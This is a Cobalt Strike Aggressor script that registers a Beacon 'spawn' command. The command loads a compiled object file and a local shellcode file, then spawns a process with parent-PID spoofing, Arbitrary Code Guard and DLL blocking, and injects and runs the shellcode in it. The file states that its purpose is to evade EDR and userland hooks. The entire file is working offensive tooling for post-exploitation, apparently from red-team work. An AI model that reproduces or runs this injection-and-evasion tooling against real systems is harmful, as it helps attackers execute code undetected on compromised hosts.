spawn.cna

beacon_command_register(
    "spawn", 
    "Spawns a process, then injects & executes shellcode. Built to evade EDR/UserLand hooks by spawning the process with Arbitrary Code Guard (ACG), BlockDll, and PPID spoofing.", 
    "Synopsis: spawn /path/to/exe PPID /local/path/to/shellcode.bin"
);

alias spawn {
    if(size(@_) != 4)
    {
        berror($1, "Incorrect usage!");
        berror($1, beacon_command_detail("spawn"));
        return;
    }
    local('$handle $data $args');

    $handle = openf(script_resource("spawn.x64.o"));
    $data = readb($handle, -1);
    closef($handle);

    $sc_handle = openf($4);
	$sc_data = readb($sc_handle, -1);
	closef($sc_handle);

    $args = bof_pack($1,"zib",$2,$3,$sc_data);

    btask($1, "SPAWN (Bobby Cooke//SpiderLabs|@0xBoku|github.com/boku7)");
    beacon_inline_execute($1, $data, "go", $args);
}